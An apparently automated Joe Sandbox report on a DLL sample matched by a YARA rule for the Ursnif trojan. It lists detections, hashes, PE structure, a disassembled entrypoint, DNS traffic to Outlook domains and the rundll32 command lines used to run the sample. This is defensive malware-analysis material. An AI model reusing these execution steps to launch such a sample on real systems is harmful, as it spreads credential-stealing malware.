No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.bb0000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.161.50	true	false	high
HHN-efz.ms-acdc.office.com	40.101.138.2	true	false	high
FRA-efz.ms-acdc.office.com	40.101.81.162	true	false	high
www.outlook.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404147
Start date:	04.05.2021
Start time:	18:50:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	8OKQ6ogGRx.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.winDLL@12/4@3/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 12.7% (good quality ratio 12.1%) Quality average: 79.5% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 73% Number of executed functions: 39 Number of non-executed functions: 71
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 204.79.197.200, 13.107.21.200, 20.49.157.6, 104.43.193.48, 168.61.161.212, 92.122.145.220, 184.30.24.56, 2.20.142.209, 2.20.142.210, 20.82.209.183, 92.122.213.247, 92.122.213.194, 88.221.62.148, 2.17.179.193, 84.53.167.113, 20.82.210.154 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, wildcard.weather.microsoft.com.edgekey.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, tile-service.weather.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, e1553.dspg.akamaiedge.net VT rate limit hit for: /opt/package/joesandbox/database/analysis/404147/sample/8OKQ6ogGRx.dll

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
outlook.com	n6osajjc938.exe	Get hash	malicious	Browse	104.47.54.36
	9b3d7f02.exe	Get hash	malicious	Browse	104.47.54.36
	5zc9vbGBo3.exe	Get hash	malicious	Browse	52.101.24.0
	InnAcjnAmG.exe	Get hash	malicious	Browse	104.47.53.36
	8X93Tzvd7V.exe	Get hash	malicious	Browse	52.101.24.0
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	104.47.53.36
	SecuriteInfo.com.Mal.GandCrypt-A.24654.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	104.47.54.36
	SecuriteInfo.com.W32.AIDetect.malware2.29567.exe	Get hash	malicious	Browse	104.47.53.36
	lsass(1).exe	Get hash	malicious	Browse	104.47.59.138
	rtofwqxq.exe	Get hash	malicious	Browse	104.47.53.36
	VufxYArno1.exe	Get hash	malicious	Browse	104.47.53.36
FRA-efz.ms-acdc.office.com	dechert-Investment078867-xlsx.Html	Get hash	malicious	Browse	52.97.189.66
	murexltd-Investment_265386-xlsx.html	Get hash	malicious	Browse	52.97.188.66
	z2xQEFs54b.exe	Get hash	malicious	Browse	52.97.250.226
	sgs-Investment974041-xlsx.Html	Get hash	malicious	Browse	40.101.19.162
	roccor-invoice-648133_xls.HtMl	Get hash	malicious	Browse	52.97.200.162
	redwirespace-invoice-982323_xls.HtMl	Get hash	malicious	Browse	40.101.12.82
	prismcosec-invoice-647718_xls.HtMl	Get hash	malicious	Browse	40.101.81.130
	E848.tmp.exe	Get hash	malicious	Browse	40.101.81.130
	Payment.html	Get hash	malicious	Browse	52.97.250.194
	Remittance advice.htm	Get hash	malicious	Browse	52.97.250.210
	0G2gue8shl.exe	Get hash	malicious	Browse	52.97.176.2
	February Payroll.xls.htm	Get hash	malicious	Browse	52.97.250.242
	PURCHASE ORDER#34556558.exe	Get hash	malicious	Browse	52.97.200.178
	Proforma Invoice.exe	Get hash	malicious	Browse	52.97.250.210
	E-DEKONT.exe	Get hash	malicious	Browse	52.97.144.178
	DHL Notification -AWB DHL-2021011293002.exe	Get hash	malicious	Browse	52.97.201.82
	DHL DOCS.exe	Get hash	malicious	Browse	40.101.80.2
	ORDER REQUEST.exe	Get hash	malicious	Browse	40.101.121.34
	INVOICE.exe	Get hash	malicious	Browse	52.97.188.66
	RECEIPT.exe	Get hash	malicious	Browse	40.101.81.146
HHN-efz.ms-acdc.office.com	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
HHN-efz.ms-acdc.office.com	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AE905FC9-AD44-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	21592
Entropy (8bit):	1.7594977787918844
Encrypted:	false
SSDEEP:	48:IwiGcprjGwpL0qUG/ap80qGBZGIpc0qG4fGeGvnZpv0qG4fGvw3Go3qp90qG4fGm:rWZ9Za2wLWk7tkNfk4FMktH
MD5:	586DB94373650BC9E3A11F8D83A43119
SHA1:	44830C9A42A7059540F75902D8ACCCD0C2CCC110
SHA-256:	CBB34950E8F8B039E5E8A0C56C9F0409E3D51D1418EC7B6FA664F6B7598BBF15
SHA-512:	CB3756652C002D04099293D445F789B3E7466756473E5BF50A9EBE635BA65E76D6C36F1C54351A0C11CF2CD9772A70F4F4F67F498FCAD27312D4E7250CF7AE3C
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AE905FCB-AD44-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.573944233836972
Encrypted:	false
SSDEEP:	48:IwMGcprRGwpapG4pQtGrapbShZGQpB2GHHpcIaTGUpG:rQZLQr6NBShzj12IqA
MD5:	3ECFC996F83DCA4AA885FF3F72B684AD
SHA1:	4D5F1BC278921B850632B9F131CEACF9F6528BAE
SHA-256:	94138719C28C299D93F3175DAC56C4A5A1097852F4410206DBDC1364FEA3C108
SHA-512:	47F4F94D461247526ECBF9999F81775CDAC82CE5FA41018ADBDCA8D2D13FF149FCB62E8BA274761AA1EB0FEFDD4CDCABE7E9A631AC00CE72BA31AD0667F360E8
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFFDCA7E35786F02EC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12917
Entropy (8bit):	0.39862566692758644
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo0qDF9lo0qJ9lW0qGcGvwywcGtRwi:kBqoI0qS0qM0qGcGvwywcGtRwi
MD5:	5AC667C80F587E96B1FA80C48BB205AC
SHA1:	8AE06DAFAC5BD829EBDF2585C6BE72B11645F7EC
SHA-256:	4603ADFFB302AFD33E6755000AF43E78307809BE6060D50346B41AFFB2655282
SHA-512:	DA5BB434493D5023D766CCAD26D075683F287310E2FD53E2C51EDB7B0119B4DA534223D047822E72DF4F31C5838630386575432052267BB45C2FA524E63E2951
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFFF4222CFAFFA654A.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25657
Entropy (8bit):	0.31341444137710367
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwT9lwT9l2a:kBqoxKAuvScS+sKa
MD5:	B141DA2A351E435F1D185F48AC4E0FF6
SHA1:	A257DD1A9B4D1AB44020E74757AC5C9C69575588
SHA-256:	1D1C565FF314222220A0BDEADB603FCDE1A742DEA5A4210871A6C6E0AAE37C4A
SHA-512:	49E24F4266573BEC3E25D738F23A9D169F14FBA3FBC7F4C6F80A9657BBA4B5882A4477734AD04A45FE4EA57F11F1542657F1184D97AD1FD03BA659287AF18D5A
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.549322455653532
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8OKQ6ogGRx.dll
File size:	523264
MD5:	e8eae1a820426a722c7cae54ed5bacd8
SHA1:	4d8368f112e0c56e7caccb89724bfdad1999e706
SHA256:	eb498648d17ad5250ab1f38b190dd2da8bfa8db3ee86054db991db79d15ad5cc
SHA512:	b75df93529215c6003ddb86bc76a52144b29aec918a40a9dadec7446f67cc2626b67fa1738ed148e81a1c706dded69f609e1cd592cf13034ef9fd2cb21603032
SSDEEP:	12288:CdXaT8lLVrp6I7MsfHqWxSWlNTjGoLYTbgOJpXLH:CdXhp1YCMuFx/jGo0XL
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................^.G.......T......AN.......V.......i.......h.....^.B...............l.......U.......R.......W.....Rich...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x104a38a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6089CC25 [Wed Apr 28 20:57:09 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	61abfa6d76443dd7d018df0c9cf8b0a5

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FCE58D690B7h
call 00007FCE58D6F684h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FCE58D690BCh
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 0107B4A8h
call 00007FCE58D69FCCh
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007FCE58D690BEh
cmp dword ptr [0118E36Ch], esi
je 00007FCE58D6919Ah
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007FCE58D690B7h
cmp esi, 02h
jne 00007FCE58D690E7h
mov ecx, dword ptr [01075238h]
test ecx, ecx
je 00007FCE58D690BEh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FCE58D69167h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007FCE58D68EC6h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FCE58D69150h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007FCE58D66926h
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007FCE58D690DAh
test edi, edi
jne 00007FCE58D690D6h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007FCE58D6690Eh
push ebx
push edi
push dword ptr [ebp+08h]
call 00007FCE58D68E8Ch
mov eax, dword ptr [01075238h]
test eax, eax
je 00007FCE58D690B9h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7bbd0	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7bc28	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x191000	0x498	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x192000	0x2818	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6b200	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7a980	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6b000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6988d	0x69a00	False	0.70416512574	data	6.62139930186	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x6b000	0x115e0	0x11600	False	0.471967738309	data	5.23669501131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x113300	0x1800	False	0.333984375	data	3.88700180982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x191000	0x498	0x600	False	0.356119791667	data	2.99935790597	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x192000	0x2818	0x2a00	False	0.743117559524	data	6.59705049508	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1910a0	0x35c	data	English	United States
RT_MANIFEST	0x191400	0x91	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetEnvironmentVariableA, SetStdHandle, SetFilePointerEx, WriteConsoleW, CloseHandle, GetFileAttributesW, GetWindowsDirectoryW, CreateProcessW, OpenMutexW, VirtualProtectEx, EncodePointer, DecodePointer, HeapAlloc, GetSystemTimeAsFileTime, RaiseException, RtlUnwind, GetCommandLineA, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, HeapFree, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, GetProcessHeap, IsDebuggerPresent, GetTimeZoneInformation, SetLastError, GetCurrentThread, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, SetConsoleCtrlHandler, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, FreeLibrary, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, OutputDebugStringW, GetStringTypeW, CreateFileW
USER32.dll	GetPropW, CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW
GDI32.dll	MoveToEx, SetTextColor, SetBkMode, SetBkColor, LineTo, IntersectClipRect, GetClipBox, GetCharWidthW, CreateBitmap
COMCTL32.dll	ImageList_SetDragCursorImage, ImageList_Draw, PropertySheetW, CreatePropertySheetPageA

Exports

Name	Ordinal	Address
Enterbeen	1	0x1047ed0
Multiply	2	0x1047fb0

Version Infos

Description	Data
LegalCopyright	Fingergeneral Corporation. All rights reserved
InternalName	Probable
FileVersion	5.5.2.216 Sidedone
CompanyName	Fingergeneral Corporation
ProductName	Fingergeneral Wear twenty
ProductVersion	5.5.2.216
FileDescription	Fingergeneral Wear twenty
OriginalFilename	turn.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 18:51:18.333254099 CEST	60985	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:18.338377953 CEST	50200	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:18.378372908 CEST	51281	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:18.387293100 CEST	53	50200	8.8.8.8	192.168.2.3
May 4, 2021 18:51:18.408304930 CEST	53	60985	8.8.8.8	192.168.2.3
May 4, 2021 18:51:18.426934004 CEST	53	51281	8.8.8.8	192.168.2.3
May 4, 2021 18:51:19.130103111 CEST	49199	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:19.178749084 CEST	53	49199	8.8.8.8	192.168.2.3
May 4, 2021 18:51:20.001471043 CEST	50620	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:20.050255060 CEST	53	50620	8.8.8.8	192.168.2.3
May 4, 2021 18:51:21.065521002 CEST	64938	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:21.117543936 CEST	53	64938	8.8.8.8	192.168.2.3
May 4, 2021 18:51:21.394946098 CEST	60152	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:21.456048012 CEST	53	60152	8.8.8.8	192.168.2.3
May 4, 2021 18:51:21.984514952 CEST	57544	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:22.033207893 CEST	53	57544	8.8.8.8	192.168.2.3
May 4, 2021 18:51:23.754410982 CEST	55984	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:23.811686039 CEST	53	55984	8.8.8.8	192.168.2.3
May 4, 2021 18:51:24.549612045 CEST	64185	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:24.601274967 CEST	53	64185	8.8.8.8	192.168.2.3
May 4, 2021 18:51:25.503813982 CEST	65110	53	192.168.2.3	8.8.8.8
May 4, 2021 18:51:25.552414894 CEST	53	65110	8.8.8.8	192.168.2.3
May 4, 2021 18:52:03.254508972 CEST	58361	53	192.168.2.3	8.8.8.8
May 4, 2021 18:52:03.313453913 CEST	53	58361	8.8.8.8	192.168.2.3
May 4, 2021 18:52:15.317749023 CEST	63492	53	192.168.2.3	8.8.8.8
May 4, 2021 18:52:15.390950918 CEST	53	63492	8.8.8.8	192.168.2.3
May 4, 2021 18:52:20.053031921 CEST	60831	53	192.168.2.3	8.8.8.8
May 4, 2021 18:52:20.103934050 CEST	53	60831	8.8.8.8	192.168.2.3
May 4, 2021 18:52:38.655663013 CEST	60100	53	192.168.2.3	8.8.8.8
May 4, 2021 18:52:38.708623886 CEST	53	60100	8.8.8.8	192.168.2.3
May 4, 2021 18:52:56.289465904 CEST	53195	53	192.168.2.3	8.8.8.8
May 4, 2021 18:52:56.348114014 CEST	53	53195	8.8.8.8	192.168.2.3
May 4, 2021 18:53:27.666838884 CEST	50141	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:27.721466064 CEST	53	50141	8.8.8.8	192.168.2.3
May 4, 2021 18:53:28.937237978 CEST	53023	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:28.986049891 CEST	53	53023	8.8.8.8	192.168.2.3
May 4, 2021 18:53:29.070245028 CEST	49563	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:29.073194027 CEST	51352	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:29.124036074 CEST	53	49563	8.8.8.8	192.168.2.3
May 4, 2021 18:53:29.148881912 CEST	53	51352	8.8.8.8	192.168.2.3
May 4, 2021 18:53:29.954231024 CEST	59349	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:30.011257887 CEST	53	59349	8.8.8.8	192.168.2.3
May 4, 2021 18:53:30.180514097 CEST	57084	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:30.229265928 CEST	53	57084	8.8.8.8	192.168.2.3
May 4, 2021 18:53:30.661994934 CEST	58823	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:30.711884975 CEST	53	58823	8.8.8.8	192.168.2.3
May 4, 2021 18:53:32.214960098 CEST	57568	53	192.168.2.3	8.8.8.8
May 4, 2021 18:53:32.274662971 CEST	53	57568	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 18:53:28.937237978 CEST	192.168.2.3	8.8.8.8	0x4990	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
May 4, 2021 18:53:29.954231024 CEST	192.168.2.3	8.8.8.8	0xea33	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.180514097 CEST	192.168.2.3	8.8.8.8	0x30ea	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
May 4, 2021 18:53:28.986049891 CEST	8.8.8.8	192.168.2.3	0x4990	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.011257887 CEST	8.8.8.8	192.168.2.3	0xea33	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:53:30.011257887 CEST	8.8.8.8	192.168.2.3	0xea33	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:53:30.011257887 CEST	8.8.8.8	192.168.2.3	0xea33	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:53:30.011257887 CEST	8.8.8.8	192.168.2.3	0xea33	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:53:30.011257887 CEST	8.8.8.8	192.168.2.3	0xea33	No error (0)	FRA-efz.ms-acdc.office.com		40.101.81.162	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.011257887 CEST	8.8.8.8	192.168.2.3	0xea33	No error (0)	FRA-efz.ms-acdc.office.com		40.101.12.98	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.011257887 CEST	8.8.8.8	192.168.2.3	0xea33	No error (0)	FRA-efz.ms-acdc.office.com		52.97.176.2	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.229265928 CEST	8.8.8.8	192.168.2.3	0x30ea	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:53:30.229265928 CEST	8.8.8.8	192.168.2.3	0x30ea	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:53:30.229265928 CEST	8.8.8.8	192.168.2.3	0x30ea	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:53:30.229265928 CEST	8.8.8.8	192.168.2.3	0x30ea	No error (0)	HHN-efz.ms-acdc.office.com		40.101.138.2	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.229265928 CEST	8.8.8.8	192.168.2.3	0x30ea	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.66	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.229265928 CEST	8.8.8.8	192.168.2.3	0x30ea	No error (0)	HHN-efz.ms-acdc.office.com		40.101.138.18	A (IP address)	IN (0x0001)
May 4, 2021 18:53:30.229265928 CEST	8.8.8.8	192.168.2.3	0x30ea	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.66	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 2168 Parent PID: 5620

General

Start time:	18:51:24
Start date:	04/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll'
Imagebase:	0x50000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3880 Parent PID: 2168

General

Start time:	18:51:25
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3468 Parent PID: 2168

General

Start time:	18:51:25
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen
Imagebase:	0x9e0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

